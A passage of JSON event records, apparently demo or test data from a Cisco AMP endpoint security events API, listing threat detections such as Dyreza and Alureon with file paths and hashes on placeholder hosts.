Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257843180601000,"timestamp":1610705569,"timestamp_nanoseconds":536000000,"date":"2021-01-15T10:12:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257843180601413","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":834324,"timestamp":1610705568,"timestamp_nanoseconds":82375000,"date":"2021-01-15T10:12:48+00:00","event_type":"Uninstall","event_type_id":553648166,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257791640994000,"timestamp":1610705557,"timestamp_nanoseconds":898000000,"date":"2021-01-15T10:12:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257791640993860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257740101386000,"timestamp":1610705545,"timestamp_nanoseconds":901000000,"date":"2021-01-15T10:12:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257740101386307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257688561779000,"timestamp":1610705533,"timestamp_nanoseconds":874000000,"date":"2021-01-15T10:12:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257688561778754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257641317138000,"timestamp":1610705522,"timestamp_nanoseconds":236000000,"date":"2021-01-15T10:12:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257641317138497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":641000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667317698527247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":529000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667317698527246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":121000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667317698527245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257589777531000,"timestamp":1610705510,"timestamp_nanoseconds":224000000,"date":"2021-01-15T10:11:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257589777530944","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257564007727000,"timestamp":1610705504,"timestamp_nanoseconds":218000000,"date":"2021-01-15T10:11:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257564007727167","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257512468120000,"timestamp":1610705492,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:11:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257512468119614","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257460928512000,"timestamp":1610705480,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:11:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257460928512061","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789131","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"5A.tmp","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\5A.tmp","identity":{"sha256":"aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33","sha1":"420da91c3199993c9f245b21ea060b69d7ecfd49","md5":"bfcc0861c7fb965c1f7473d3dc42cff6"},"parent":{"process_id":1480,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f","sha1":"e6e904b84332191d44de729deb7bfed9bcef2ce9","md5":"60784f891563fb1b767f70117fc2428f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":156000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":93000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"57.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\57.tmp","identity":{"sha256":"aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33","sha1":"420da91c3199993c9f245b21ea060b69d7ecfd49","md5":"bfcc0861c7fb965c1f7473d3dc42cff6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":93000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Alureon:Olmarik-tpd","detection_id":"5825617812646789128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"58.tmp","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\58.tmp","identity":{"sha256":"34e2a286618a82905957c64397999e2d38092ff6b7c0c21192760376c9036f1a","sha1":"d8e5ded034afbb77ca3759e35dd0f200255a6fd5","md5":"1ef0e0c765da7f727e1eb8ff38d02ff1"},"parent":{"process_id":1480,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f","sha1":"e6e904b84332191d44de729deb7bfed9bcef2ce9","md5":"60784f891563fb1b767f70117fc2428f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":78000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789127","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821830","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"59.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\59.tmp","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":3728,"disposition":"Malicious","file_name":"tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821829","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"56.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\56.tmp","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"process_id":3728,"disposition":"Malicious","file_name":"tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat 